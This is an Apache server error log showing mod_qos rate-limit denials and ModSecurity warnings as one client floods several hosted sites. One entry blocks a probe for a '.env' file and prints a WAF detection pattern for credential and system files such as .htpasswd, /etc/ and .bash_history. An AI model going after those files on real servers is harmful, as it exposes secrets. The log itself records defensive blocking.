[Tue May 26 19:54:48.634422 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMFZMwN0DpLVWo6LGRgAAAKw
[Tue May 26 19:54:48.636277 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMFZMwN0DpLVWo6LGRwAAAQA
[Tue May 26 19:54:48.636957 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMEqK9k_ZUB2Vp25LuwAAAe8
[Tue May 26 19:54:48.637865 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMGDRMqfxdEDkoszTkwAAAAI
[Tue May 26 19:54:48.637973 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMEqK9k_ZUB2Vp25LvAAAAa0
[Tue May 26 19:54:48.660435 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMFZMwN0DpLVWo6LGSgAAAKw
[Tue May 26 19:54:48.732472 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGTQAAAMM
[Tue May 26 19:54:48.733045 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGTgAAAME
[Tue May 26 19:54:48.738605 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:60066] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGTwAAAJ0
[Tue May 26 19:54:48.781201 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGUAAAAMQ
[Tue May 26 19:54:48.788829 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGUQAAAKU
[Tue May 26 19:54:48.790162 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGUgAAAKI
[Tue May 26 19:54:48.791005 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGUwAAAPg
[Tue May 26 19:54:48.792643 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LvgAAAao
[Tue May 26 19:54:48.793160 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMGDRMqfxdEDkoszTlgAAAAM
[Tue May 26 19:54:48.813620 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LvwAAAgc
[Tue May 26 19:54:48.880612 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGVwAAAKE
[Tue May 26 19:54:48.884422 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGWAAAALs
[Tue May 26 19:54:48.888546 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:60066] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGWQAAAK4
[Tue May 26 19:54:48.936141 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGWgAAAIc
[Tue May 26 19:54:48.938809 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGWwAAAMA
[Tue May 26 19:54:48.940354 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGXAAAALI
[Tue May 26 19:54:48.943749 2026] [qos:error] [pid 93868:tid 94278] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LwQAAAaM
[Tue May 26 19:54:48.943956 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMFZMwN0DpLVWo6LGXQAAAMM
[Tue May 26 19:54:48.946958 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMGDRMqfxdEDkoszTmgAAACE
[Tue May 26 19:54:48.966382 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMEqK9k_ZUB2Vp25LwgAAAcg
[Tue May 26 19:54:49.028841 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGXgAAAPg
[Tue May 26 19:54:49.039346 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:60066] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGXwAAAJ8
[Tue May 26 19:54:49.044388 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGYAAAALA
[Tue May 26 19:54:49.086764 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGYQAAAKE
[Tue May 26 19:54:49.089090 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGYgAAALs
[Tue May 26 19:54:49.094224 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGYwAAAK4
[Tue May 26 19:54:49.097525 2026] [qos:error] [pid 93868:tid 94367] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25LwwAAAfw
[Tue May 26 19:54:49.100588 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTnAAAAFc
[Tue May 26 19:54:49.100783 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGZAAAAOA
[Tue May 26 19:54:49.117929 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25LxAAAAd4
[Tue May 26 19:54:49.176436 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGawAAAKk
[Tue May 26 19:54:49.200221 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:60066] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGbgAAAMQ
[Tue May 26 19:54:49.200686 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:60036] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGbwAAAOw
[Tue May 26 19:54:49.234326 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGcAAAAQE
[Tue May 26 19:54:49.242445 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGcQAAAKI
[Tue May 26 19:54:49.246463 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGcgAAAI4
[Tue May 26 19:54:49.248972 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25LxQAAAck
[Tue May 26 19:54:49.253487 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGcwAAAPg
[Tue May 26 19:54:49.253961 2026] [security2:error] [pid 93576:tid 93808] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/beta/.env"] [unique_id "ahWtMWDRMqfxdEDkoszTngAAAGA"]
[Tue May 26 19:54:49.254709 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTnwAAACU
[Tue May 26 19:54:49.271489 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25LxgAAAeI
[Tue May 26 19:54:49.279181 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFyAAAANc"]
[Tue May 26 19:54:49.283223 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LkgAAAgg"]
[Tue May 26 19:54:49.283869 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LhwAAAZI"]
[Tue May 26 19:54:49.288633 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LlAAAAcE"]
[Tue May 26 19:54:49.295337 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LmQAAAag"]
[Tue May 26 19:54:49.299545 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFwQAAAMc"]
[Tue May 26 19:54:49.300026 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFvgAAAQM"]
[Tue May 26 19:54:49.309039 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFyQAAANs"]
[Tue May 26 19:54:49.317827 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LnQAAAec"]
[Tue May 26 19:54:49.331597 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LF1AAAAIg"]
[Tue May 26 19:54:49.332131 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LkwAAAcU"]
[Tue May 26 19:54:49.341813 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LoAAAAd8"]
[Tue May 26 19:54:49.343462 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LF2wAAANg"]
[Tue May 26 19:54:49.345974 2026] [security2:error] [pid 86490:tid 86647] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGCQAAAKA"]
[Tue May 26 19:54:49.352663 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LF_QAAALY"]
[Tue May 26 19:54:49.357613 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LkQAAAc4"]
[Tue May 26 19:54:49.358687 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LF_gAAAPw"]
[Tue May 26 19:54:49.360364 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LF_wAAANQ"]
[Tue May 26 19:54:49.363136 2026] [security2:error] [pid 86490:tid 86726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LF0wAAAO8"]
[Tue May 26 19:54:49.378174 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL1ZMwN0DpLVWo6LFywAAAKM"]
[Tue May 26 19:54:49.389585 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMGDRMqfxdEDkoszThQAAAGw"]
[Tue May 26 19:54:49.392267 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtL0qK9k_ZUB2Vp25LmAAAAbk"]
[Tue May 26 19:54:49.396984 2026] [security2:error] [pid 86490:tid 86664] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGVgAAALE"]
[Tue May 26 19:54:49.419487 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGAAAAAIo"]
[Tue May 26 19:54:49.431017 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGDwAAAN4"]
[Tue May 26 19:54:49.433434 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGIQAAAJU"]
[Tue May 26 19:54:49.443637 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGAQAAAPk"]
[Tue May 26 19:54:49.451220 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMGDRMqfxdEDkoszThwAAAH0"]
[Tue May 26 19:54:49.471052 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGGAAAAMo"]
[Tue May 26 19:54:49.472418 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMEqK9k_ZUB2Vp25LqwAAAeY"]
[Tue May 26 19:54:49.472499 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGFQAAAPQ"]
[Tue May 26 19:54:49.472899 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMGDRMqfxdEDkoszThAAAAEU"]
[Tue May 26 19:54:49.472932 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGEwAAAIY"]
[Tue May 26 19:54:49.473775 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGHgAAAJ4"]
[Tue May 26 19:54:49.592743 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtMUqK9k_ZUB2Vp25L6AAAAac
[Tue May 26 19:54:49.615705 2026] [qos:error] [pid 93868:tid 94268] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMUqK9k_ZUB2Vp25L6gAAAZk
[Tue May 26 19:54:49.617737 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGqAAAAI4
[Tue May 26 19:54:49.618602 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGqQAAAJU
[Tue May 26 19:54:49.618861 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTugAAAFU
[Tue May 26 19:54:49.619229 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGqgAAAOE
[Tue May 26 19:54:49.743718 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTuwAAAEI
[Tue May 26 19:54:49.752188 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGrAAAANA
[Tue May 26 19:54:49.754378 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGrQAAAPk
[Tue May 26 19:54:49.767801 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMVZMwN0DpLVWo6LGrwAAAOc
[Tue May 26 19:54:49.767931 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMWDRMqfxdEDkoszTvQAAAFk
